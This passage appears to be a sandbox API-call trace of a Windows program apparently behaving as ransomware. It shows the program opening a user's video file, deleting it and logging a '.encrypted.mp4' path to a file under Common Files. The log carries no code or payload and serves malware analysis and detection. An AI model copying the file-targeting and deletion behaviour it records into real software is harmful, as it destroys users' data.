hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0043.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0043.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0043.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.788] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.788] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.788] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.788] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0043.788] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.788] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.788] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.788] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.788] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.788] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.789] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.789] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.789] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.789] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.789] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.789] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.789] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.789] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.789] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.789] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.789] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0043.789] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.789] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\u373x4nowfcnj.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0043.789] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.789] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.789] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.789] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.790] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0043.790] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.790] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.790] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.790] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.790] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.790] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.790] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.790] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.790] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0043.790] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.790] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.790] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.791] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.791] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.791] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.791] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.791] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4", lpFilePart=0x0) returned 0x4a [0043.791] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9c13a20, ftCreationTime.dwHighDateTime=0x1d5b7f0, ftLastAccessTime.dwLowDateTime=0xdc131530, ftLastAccessTime.dwHighDateTime=0x1d5bf98, ftLastWriteTime.dwLowDateTime=0x19ceb820, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x12854, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="u373x4noWFcnJ.mp4", cAlternateFileName="U373X4~1.MP4")) returned 0x7c2100 [0043.791] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\u373x4nowfcnj.mp4")) returned 1 [0043.792] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9c13a20, ftCreationTime.dwHighDateTime=0x1d5b7f0, ftLastAccessTime.dwLowDateTime=0xdc131530, ftLastAccessTime.dwHighDateTime=0x1d5bf98, ftLastWriteTime.dwLowDateTime=0x19ceb820, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x12854, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="u373x4noWFcnJ.mp4", cAlternateFileName="U373X4~1.MP4")) returned 0 [0043.792] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0043.793] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.793] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0043.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0043.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0043.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.793] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.793] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0043.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.793] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.793] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.793] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0043.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0043.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.793] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0043.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.794] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0043.794] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.794] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.794] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0043.794] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.794] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.794] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0043.794] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x3920, lpOverlapped=0x0) returned 1 [0043.795] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0043.795] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x3920, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.795] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.encrypted.mp4\r\n", cchWideChar=87, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 87 [0043.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x57) returned 0x794b90 [0043.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.encrypted.mp4\r\n", cchWideChar=87, lpMultiByteStr=0x794b90, cbMultiByte=87, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.encrypted.mp4\r\n", lpUsedDefaultChar=0x0) returned 87 [0043.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0043.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0043.796] WriteFile (in: hFile=0x140, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x56, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x56, lpOverlapped=0x0) returned 1 [0043.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0043.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.796] CloseHandle (hObject=0x140) returned 1 [0043.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0043.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0043.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0043.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0043.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0043.798] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0043.799] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0043.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0043.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0043.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.800] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0043.800] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.800] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0043.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 